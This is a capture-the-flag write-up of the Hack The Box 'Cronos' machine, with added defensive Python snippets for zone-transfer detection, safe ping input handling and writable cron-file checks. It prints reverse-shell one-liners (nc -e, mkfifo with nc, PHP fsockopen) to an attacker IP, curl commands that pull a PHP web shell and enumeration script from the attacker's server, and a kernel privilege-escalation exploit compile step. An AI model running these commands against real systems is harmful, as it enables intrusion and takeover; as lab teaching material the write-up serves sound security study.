Hack The Box – Cronos – writeup

Cronos is a Linux box where a few attempts failed before I found a method that worked to get the root password at the end. It was good practice of the “try harder” motto.

Starting with an nmap scan we can see 3 ports open: SSH, DNS and HTTP.

[screenshot: cronos1]

I like to check whether any default admin:admin-type passwords work for SSH login to give us an easy start, but no luck.

[screenshot: cronos2]

We can then head over to the webpage and see that it looks like a default Apache install.

[screenshot: cronos3]

As the default index.html doesn’t seem to be hiding any clues, I started a DirBuster scan to find any hidden files or folders, but that also comes up empty.

[screenshot: cronos4]

The DNS port we found earlier is likely there for a reason; most HTB boxes don’t have it running unless it’s going to help us compromise the box, so let’s do some enumeration and see what we can find. An nslookup shows the subdomain ns1.cronos.htb.

[screenshot: cronos5]

It’s possible that other subdomains are in use, so let’s edit the /etc/hosts file, first trying the domain cronos.htb.

[screenshot: cronos6]

If we then revisit the server in our browser it takes us to a new page. That’s a good sign we’re on the right track, but there are no more clues on this page, so we’re likely going to have to keep digging with DNS.

[screenshot: cronos7]

We can do a zone transfer to see what other information the DNS server throws up. A few more subdomains are listed, and anything with “admin” in the name is always worth looking into further.

[screenshot: cronos8]
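From the defender’s side, the zone transfer above should never have been answered, and it should have been noticed. The following is an added example (not part of the writeup) that parses BIND 9 query-log lines and flags AXFR/IXFR requests from any client that is not a configured secondary; the log lines, addresses and the allowed-peer set are constructed placeholders modelled on the lab.

```python
import re

# Constructed BIND 9 query-log lines in the default "queries" channel layout;
# the addresses are lab placeholders modelled on the writeup, not real hosts.
SAMPLE_LOG = """\
19-Jun-2018 10:14:58.101 client 10.10.14.23#51234 (cronos.htb): query: cronos.htb IN A -E(0) (10.10.10.13)
19-Jun-2018 10:15:02.377 client 10.10.14.23#39112 (cronos.htb): query: cronos.htb IN AXFR -E(0)T (10.10.10.13)
19-Jun-2018 10:15:40.002 client 10.10.10.14#53 (cronos.htb): query: cronos.htb IN AXFR -E(0)T (10.10.10.13)
19-Jun-2018 10:16:01.500 client 10.10.14.23#40001 (ns1.cronos.htb): query: ns1.cronos.htb IN A -E(0) (10.10.10.13)
"""

# Newer BIND releases insert a "@0x..." client handle after "client"; the
# optional group absorbs it so both layouts parse.
QUERY_RE = re.compile(
    r"client (?:@\S+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+ \([^)]*\): "
    r"query: (?P<qname>\S+) IN (?P<qtype>\S+)")

# Assumed for the example: the only host entitled to pull the zone is the secondary.
ALLOWED_TRANSFER_PEERS = {"10.10.10.14"}
TRANSFER_TYPES = {"AXFR", "IXFR"}

def parse_queries(log_text):
    """Yield (client_ip, qname, qtype) for every line that looks like a query entry."""
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("ip"), m.group("qname"), m.group("qtype")

def suspicious_transfers(log_text, allowed=ALLOWED_TRANSFER_PEERS):
    """Zone-transfer requests from clients that are not configured secondaries.
    The query log records the request, not whether it was answered, so a hit
    is worth checking either way: if the transfer succeeded, every record in
    the zone (every subdomain, as on Cronos) went to an unknown party."""
    return [(ip, qname, qtype) for ip, qname, qtype in parse_queries(log_text)
            if qtype in TRANSFER_TYPES and ip not in allowed]
```

The matching fix in named.conf is an allow-transfer statement that lists only the secondaries (or none), so that the server refuses the request in the first place.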

If we add this new domain to the hosts file as before and visit it, we get a new login page to attack.

[screenshot: cronos9]

Looking at the source code and trying some default admin:admin credentials doesn’t give us anything, but moving on to testing SQL injection does.

[screenshot: cronos10]

Tricking the login page into thinking our credentials were valid takes us to this very basic-looking page with some pre-built functions that ping and tracert a given IP.

[screenshot: cronos11]

As the famous web security saying goes, “Never trust user input”. Let’s see if the developer of this page took that advice and applied some sort of validation or filter to the user input.

[screenshot: cronos12]

Nope! We can run a selection of Linux commands by adding a ; after the IP address in the input box. This is the time to start looking at getting a shell back from the server. First we set up our nc listener.

[screenshot: cronos13]
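For contrast, this is how the ping form should have treated its input. It is an added example written for this writeup, not code from the box: the first function mirrors the bug (the raw field value pasted into a shell string), and the rest accept only a literal IP address and run ping as an argv list with no shell, so a ; can never start a second command. Function names are my own.

```python
import ipaddress
import subprocess

def vulnerable_ping_command(user_input):
    """The pattern the page exploits: the raw field value is pasted into a shell
    string, so a value like '10.10.14.23; id' becomes two commands once the
    shell parses it."""
    return "ping -c 4 " + user_input

def parse_target(user_input):
    """Accept only a literal IPv4/IPv6 address. Hostnames, embedded whitespace
    and shell metacharacters all make ip_address() raise, so they are rejected
    rather than sanitised."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return None

def safe_ping_argv(user_input):
    """Return an argv list for ping, or None if the input is not a bare address.
    Because the list is handed to the OS directly (shell=False), no shell ever
    sees the value; even a bug in parse_target could not turn it into a second
    command, only into a bad ping argument."""
    target = parse_target(user_input)
    if target is None:
        return None
    return ["ping", "-c", "4", target]

def run_ping(user_input, timeout=10):
    """Run ping without a shell and return its combined output, or an error
    message if the input was rejected or the process could not be run."""
    argv = safe_ping_argv(user_input)
    if argv is None:
        return "error: target must be an IP address"
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except (OSError, subprocess.TimeoutExpired) as exc:
        return "error: %s" % exc
    return proc.stdout + proc.stderr
```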

I then tried a few one-liners such as:

  • nc -e /bin/sh 10.0.14.23 4444
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.14.23 4444 >/tmp/f
  • php -r '$sock=fsockopen("10.0.14.23",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

but they didn’t work, so the next step is to see if we can put a PHP script onto the server. The one I used was the pentestmonkey one, available from the URL in this screenshot:

[screenshot: cronos14]

Once downloaded you need to enter your port and IP, then host it using the built-in Kali tool SimpleHTTPServer.

[screenshot: cronos15]

It can then be uploaded using this command appended to the IP address on the webpage:

curl -O http://10.10.14.23:8000/dodgyfile.php

[screenshot: cronos16]

Manually visiting the new file causes it to run and we get our shell.

[screenshots: cronos17, cronos18]

A quick browse to the user folder finds the flag in the usual place.

[screenshot: cronos19]

The next step is to try to upgrade our shell so we can perform a few more actions during enumeration. You can spawn a Python pty shell using:

python -c 'import pty;pty.spawn("/bin/bash");'

Then navigate over to /dev/shm in preparation for getting the LinEnum.sh script onto it.

[screenshot: cronos20]

LinEnum is a well-known script that performs lots of enumeration functions on Linux systems, saving you time and removing the risk of forgetting to run something useful. It can be found at: https://github.com/rebootuser/LinEnum

I downloaded it and placed it in my SimpleHTTPServer folder, then ran this on the victim machine to transfer it:

curl -O http://10.10.14.23:8000/linuxenum.sh

Note: you need to chmod +x the script before it will run:

[screenshot: cronos21]

The script provides a lot of useful information, starting with basic version info:

[screenshot: cronos22]

A few options for different shells if we need them for future attacks:

[screenshot: cronos23]

And it spots a PHP file running with root privileges. The name of the box, Cronos, is a clue that we should be looking at something happening with a cron job.

[screenshot: cronos24]

Looking at the artisan file, it appears this job runs the schedule method of Laravel’s artisan console. The schedule method itself isn’t inside the artisan file, but a Google search eventually turns up a reference to where it might be:

[screenshot: cronos25]

We can confirm it’s there:

[screenshot: cronos26]
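The weakness here is a root cron job whose behaviour is defined in a file a low-privilege user can edit: cron runs artisan, artisan loads app/Console/Kernel.php, and that file is writable. The following is an added example (not part of the writeup) of a check an administrator could run against the root crontab to catch exactly this: it collects the files each job depends on, follows the artisan entry point to its Kernel.php, and reports any that a non-root user could modify. The crontab text, paths and staged directory tree are constructed placeholders, not the box’s real layout.

```python
import os, re, stat, tempfile
# Constructed root crontab modelled on the writeup's scheduler job; placeholder paths.
SAMPLE_CRONTAB = """\
* * * * * php /var/www/app/artisan schedule:run >> /dev/null 2>&1
0 3 * * * /usr/local/bin/backup.sh
"""
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<cmd>.+)$")
# Laravel keeps the scheduler here, so `artisan schedule:run` depends on it too.
LARAVEL_KERNEL = "app/Console/Kernel.php"

def cron_commands(crontab_text):
    """Command part of every non-comment crontab line."""
    cmds = []
    for line in (ln.strip() for ln in crontab_text.splitlines()):
        m = CRON_LINE.match(line)
        if m and not line.startswith("#"):
            cmds.append(m.group("cmd"))
    return cmds

def writable_by_non_root(path):
    """True if someone other than root could change the file."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def risky_cron_files(crontab_text, root="/"):
    """Files a root cron job depends on that a non-root user could edit
    (`root` lets the check run against a staged copy of the filesystem)."""
    candidates = set()
    for cmd in cron_commands(crontab_text):
        for tok in cmd.split():
            if tok.startswith("/") and not tok.startswith("/dev/"):
                candidates.add(tok)
                if os.path.basename(tok) == "artisan":
                    candidates.add(os.path.join(os.path.dirname(tok), LARAVEL_KERNEL))
    real = lambda p: os.path.join(root, p.lstrip("/"))
    return [p for p in sorted(candidates)
            if os.path.isfile(real(p)) and writable_by_non_root(real(p))]

def stage_sample_tree():
    """Throwaway tree matching SAMPLE_CRONTAB, with Kernel.php world-writable
    (standing in for the web-user-writable file on the box); returns its root."""
    root = tempfile.mkdtemp()
    for rel, mode in (("var/www/app/artisan", 0o755),
                      ("var/www/app/" + LARAVEL_KERNEL, 0o666),
                      ("usr/local/bin/backup.sh", 0o755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
        os.chmod(path, mode)
    return root
```

Running it on a real host as root with the default root="/" reports files owned by someone else or group/world writable; the fix is to make the application code owned by root and read-only to the web user, or to run the scheduler as the web user instead of root.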

The Kernel file is editable, so we can add our own lines to the schedule method. If this runs as root then in theory we have pwned the system. I tried to execute a cat command to copy the contents of the root.txt file into a file I had access to:

[screenshot: cronos27]

This created the new root.txt file but for some reason didn’t copy the contents of the original, so let’s try changing the permissions instead, so that we can just browse to it manually.

[screenshot: cronos28]

Once again the task ran but didn’t work as expected. There is always more than one way to complete these challenges, so after playing with the Kernel.php file for a bit longer I went back to my enumeration and looked for other privilege escalation exploits for this version of Linux.

The first one that came up was: https://www.exploit-db.com/exploits/44298

which we can download and compile using:

gcc -o file 44298.c

[screenshot: cronos29]

We can transfer it over to the victim machine using SimpleHTTPServer as before, and running it works the first time to give us root access.

[screenshot: cronos30]

The flag is in the root folder.